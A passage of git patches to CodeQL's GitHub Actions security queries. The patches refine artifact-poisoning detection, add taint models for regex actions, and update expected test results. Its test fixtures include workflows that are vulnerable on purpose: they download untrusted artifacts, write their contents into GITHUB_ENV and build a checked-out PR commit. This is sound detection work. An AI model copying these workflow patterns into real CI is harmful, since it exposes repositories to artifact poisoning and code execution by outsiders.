semmle.label | github.event.pull_request.title \|\| "foo" | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | semmle.label | github.event.changes.body.from | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | semmle.label | github.event.changes.head.ref.from | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | semmle.label | toJson(github.event.changes) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -466,6 +479,7 @@ subpaths | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | From 71960b3ddd80a3686a9912d4650fc33e13507680 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 25 Sep 2024 18:22:46 +0200 Subject: [PATCH 0541/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index ecde4c83b20..dc2e1b8e71d 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.54 +version: 0.1.55 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index cddb4f61bf6..313c90a1423 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.54 +version: 0.1.55 groups: [actions, queries] suites: codeql-suites extractor: javascript From 010ad359d7059cbe357a129b26fb237a5cb2fd70 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 10:28:44 +0200 Subject: [PATCH 0542/1267] Add new sources and summary steps --- ql/lib/ext/manual/AsasInnab_regex-action.model.yml | 6 ++++++ ql/lib/ext/manual/MeilCli_regex-match.model.yml | 8 ++++++++ .../manual/actions-ecosystem_action-regex-match.model.yml | 6 ++++++ .../manual/dsfx3d_action-extract-unique-matches.model.yml | 6 ++++++ ql/lib/ext/manual/kaisugi_action-regex-match.model.yml | 7 +++++++ .../manual/paulschuberth_regex-extract-action.model.yml | 7 +++++++ ql/lib/ext/manual/release-kit_regex.model.yml | 7 +++++++ ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml | 7 +++++++ .../ext/manual/tmelliottjr_extract-regex-action.model.yml | 8 ++++++++ 9 files changed, 62 insertions(+) create mode 100644 ql/lib/ext/manual/AsasInnab_regex-action.model.yml create mode 100644 ql/lib/ext/manual/MeilCli_regex-match.model.yml create mode 100644 ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml create mode 100644 ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml create mode 100644 ql/lib/ext/manual/kaisugi_action-regex-match.model.yml create mode 100644 ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml create mode 100644 ql/lib/ext/manual/release-kit_regex.model.yml create mode 100644 ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml create mode 100644 ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml diff --git a/ql/lib/ext/manual/AsasInnab_regex-action.model.yml b/ql/lib/ext/manual/AsasInnab_regex-action.model.yml new file mode 100644 index 00000000000..2efaefb95b6 --- /dev/null +++ b/ql/lib/ext/manual/AsasInnab_regex-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["AsasInnab/regex-action", "*", "input.search_string", "output.first_match", "taint", "manual"] diff --git a/ql/lib/ext/manual/MeilCli_regex-match.model.yml b/ql/lib/ext/manual/MeilCli_regex-match.model.yml new file mode 100644 index 00000000000..74a0f43fd91 --- /dev/null +++ b/ql/lib/ext/manual/MeilCli_regex-match.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["MeilCli/regex-match", "*", "input.search_string", "output.matched_first", "taint", "manual"] + - ["MeilCli/regex-match", "*", "input.search_string", "output.matched_json", "taint", "manual"] + diff --git a/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml b/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml new file mode 100644 index 00000000000..edc9585b548 --- /dev/null +++ b/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["actions-ecosystem/action-regex-match", "*", "input.text", "output.*", "taint", "manual"] diff --git a/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml b/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml new file mode 100644 index 00000000000..226a151daba --- /dev/null +++ b/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["dsfx3d/action-extract-unique-matches", "*", "input.text", "output.matches", "taint", "manual"] diff --git a/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml b/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml new file mode 100644 index 00000000000..3e646e4482f --- /dev/null +++ b/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["kaisugi/action-regex-match", "*", "input.text", "output.*", "taint", "manual"] + diff --git a/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml b/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml new file mode 100644 index 00000000000..d1d930168dc --- /dev/null +++ b/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["paulschuberth/regex-extract-action", "*", "input.haystack", "output.matches", "taint", "manual"] + diff --git a/ql/lib/ext/manual/release-kit_regex.model.yml b/ql/lib/ext/manual/release-kit_regex.model.yml new file mode 100644 index 00000000000..5b2e5d9c4eb --- /dev/null +++ b/ql/lib/ext/manual/release-kit_regex.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["release-kit/regex", "*", "input.string", "output.*", "taint", "manual"] + diff --git a/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml b/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml new file mode 100644 index 00000000000..a0dfb648875 --- /dev/null +++ b/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + - ["tim-actions/get-pr-commits", "*", "output.commits", "text", "manual"] + diff --git a/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml b/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml new file mode 100644 index 00000000000..73fd66c11b9 --- /dev/null +++ b/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["tmelliottjr/extract-regex-action", "*", "input.input", "output.resultString", "taint", "manual"] + - ["tmelliottjr/extract-regex-action", "*", "input.input", "output.resultArray", "taint", "manual"] + From 26f829eff4888306fe190c666a4f4b889538650b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 10:29:47 +0200 Subject: [PATCH 0543/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index dc2e1b8e71d..8447d10d94b 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.55 +version: 0.1.56 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 313c90a1423..b167a960886 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.55 +version: 0.1.56 groups: [actions, queries] suites: codeql-suites extractor: javascript From 86c1d9c30f9b777e03d7a863b48145a06ecb33d5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 12:35:10 +0200 Subject: [PATCH 0544/1267] Improve artifact poisoning query Better check of download path Add downloading to /tmp as a sanitizer --- .../codeql/actions/dataflow/FlowSources.qll | 2 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 3 +- .../security/ArtifactPoisoningQuery.qll | 68 +++++++++++-------- .../actions/download-artifact-2/action.yaml | 32 +++++++++ .../actions/download-artifact/action.yaml | 32 +++++++++ .../.github/workflows/artifactpoisoning91.yml | 29 ++++++++ .../.github/workflows/artifactpoisoning92.yml | 29 ++++++++ .../ArtifactPoisoningCritical.expected | 11 +++ .../CWE-829/ArtifactPoisoningMedium.expected | 9 +++ .../UntrustedCheckoutCritical.expected | 18 +++++ 10 files changed, 200 insertions(+), 33 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index ce211584749..4682e7b1abf 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -107,7 +107,7 @@ class MaDSource extends RemoteFlowSource { /** * A downloaded artifact. */ -private class ArtifactSource extends RemoteFlowSource { +class ArtifactSource extends RemoteFlowSource { ArtifactSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } override string getSourceType() { result = "artifact" } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 9ca17eb4dab..4b8cff4f428 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -263,12 +263,11 @@ predicate artifactDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { // /** - * A download artifact step followed by a envvar-injection uses step . + * A download artifact step followed by a uses step . */ predicate artifactDownloadToUsesStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Step artifact, Uses uses | controlledCWD(artifact) and - madSink(succ, "envvar-injection") and pred.asExpr() = artifact and succ.asExpr() = uses and artifact.getAFollowingStep() = uses diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 6881caccd52..236cc4d8091 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -7,10 +7,7 @@ import codeql.actions.security.PoisonableSteps string unzipRegexp() { result = ".*(unzip|tar)\\s+.*" } -string unzipDirArgRegexp() { - result = "-d\\s+\"([^ ]+)\".*" or - result = "-d\\s+'([^ ]+)'.*" -} +string unzipDirArgRegexp() { result = "-d\\s+([^ ]+).*" } abstract class UntrustedArtifactDownloadStep extends Step { abstract string getPath(); @@ -164,11 +161,11 @@ class ActionsGitHubScriptDownloadStep extends UntrustedArtifactDownloadStep, Use .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) + trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) else if this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) then result = "" @@ -199,13 +196,14 @@ class GHRunArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or script.splitAt("\n").regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then - result = script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) or result = - this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) + trimQuotes(script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) or + result = + trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) else if this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) or @@ -245,37 +243,47 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { .splitAt("\n") .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then - result = script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) or result = - this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) + trimQuotes(script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) or + result = + trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) else result = "" } } class ArtifactPoisoningSink extends DataFlow::Node { + UntrustedArtifactDownloadStep download; + PoisonableStep poisonable; + ArtifactPoisoningSink() { - exists(UntrustedArtifactDownloadStep download, PoisonableStep poisonable | - download.getAFollowingStep() = poisonable and - ( - poisonable.(Run).getScriptScalar() = this.asExpr() - or - poisonable.(UsesStep) = this.asExpr() - ) and + download.getAFollowingStep() = poisonable and + // excluding artifacts downloaded to /tmp + not download.getPath().regexpMatch("^/tmp.*") and + ( + poisonable.(Run).getScriptScalar() = this.asExpr() and ( // Check if the poisonable step is a local script execution step // and the path of the command or script matches the path of the downloaded artifact - not poisonable instanceof LocalScriptExecutionRunStep or + // Checking the path for non local script execution steps is very difficult + not poisonable instanceof LocalScriptExecutionRunStep + or + // TODO: account for Run's working directory poisonable .(LocalScriptExecutionRunStep) .getCommand() .matches(["./", ""] + download.getPath() + "%") ) + or + poisonable.(UsesStep) = this.asExpr() and + download.getPath() = "" ) } + + string getPath() { result = download.getPath() } } /** @@ -283,7 +291,7 @@ class ArtifactPoisoningSink extends DataFlow::Node { * that is used may lead to artifact poisoning */ private module ArtifactPoisoningConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + predicate isSource(DataFlow::Node source) { source instanceof ArtifactSource } predicate isSink(DataFlow::Node sink) { sink instanceof ArtifactPoisoningSink } } diff --git a/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml b/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml new file mode 100644 index 00000000000..4241647d3e1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml @@ -0,0 +1,32 @@ +name: DownloadArtifacts +description: 'Downloads and unarchives artifacts for a workflow that runs on workflow_run so that it can use its data' +runs: + using: "composite" + steps: + - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); + - run: | + mkdir -p /tmp/artifacts + unzip /tmp/artifacts.zip + shell: bash + - run: | + echo "Downloaded artifacts:" + ls -ablh + shell: bash diff --git a/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml b/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml new file mode 100644 index 00000000000..0c205952102 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml @@ -0,0 +1,32 @@ +name: DownloadArtifacts +description: 'Downloads and unarchives artifacts for a workflow that runs on workflow_run so that it can use its data' +runs: + using: "composite" + steps: + - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); + - run: | + mkdir -p /tmp/artifacts + unzip /tmp/artifacts.zip -d /tmp/artifacts + shell: bash + - run: | + echo "Downloaded artifacts:" + ls -ablh /tmp/artifacts + shell: bash diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml new file mode 100644 index 00000000000..af9f01b572f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml @@ -0,0 +1,29 @@ +name: SnapshotPR +on: + workflow_run: + workflows: + - ApprovalComment + types: + - completed +jobs: + snapshot: + permissions: + id-token: write + pull-requests: write + statuses: write + if: github.event.workflow_run.conclusion == 'success' + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + - uses: ./.github/actions/download-artifact + - id: metadata + run: | + pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" + pr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)" + echo PR_COMMIT="$pr_commit" >> "$GITHUB_ENV" + echo PR_NUMBER="$pr_number" >> "$GITHUB_ENV" + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + with: + ref: ${{ env.PR_COMMIT }} + - uses: ./.github/actions/install-deps + - run: make snapshot diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml new file mode 100644 index 00000000000..e35bc73c3bd --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml @@ -0,0 +1,29 @@ +name: SnapshotPR +on: + workflow_run: + workflows: + - ApprovalComment + types: + - completed +jobs: + snapshot: + permissions: + id-token: write + pull-requests: write + statuses: write + if: github.event.workflow_run.conclusion == 'success' + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + - uses: ./.github/actions/download-artifact-2 + - id: metadata + run: | + pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" + pr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)" + echo PR_COMMIT="$pr_commit" >> "$GITHUB_ENV" + echo PR_NUMBER="$pr_number" >> "$GITHUB_ENV" + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + with: + ref: ${{ env.PR_COMMIT }} + - uses: ./.github/actions/install-deps + - run: make snapshot diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 11c6b98dc87..74edee72f5f 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -1,4 +1,7 @@ edges +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | provenance | | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | @@ -14,7 +17,10 @@ edges | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | nodes +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | @@ -45,6 +51,9 @@ nodes | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | @@ -62,3 +71,5 @@ subpaths | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | make snapshot | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 431386fae06..079a89a498c 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -1,4 +1,7 @@ edges +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | provenance | | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | 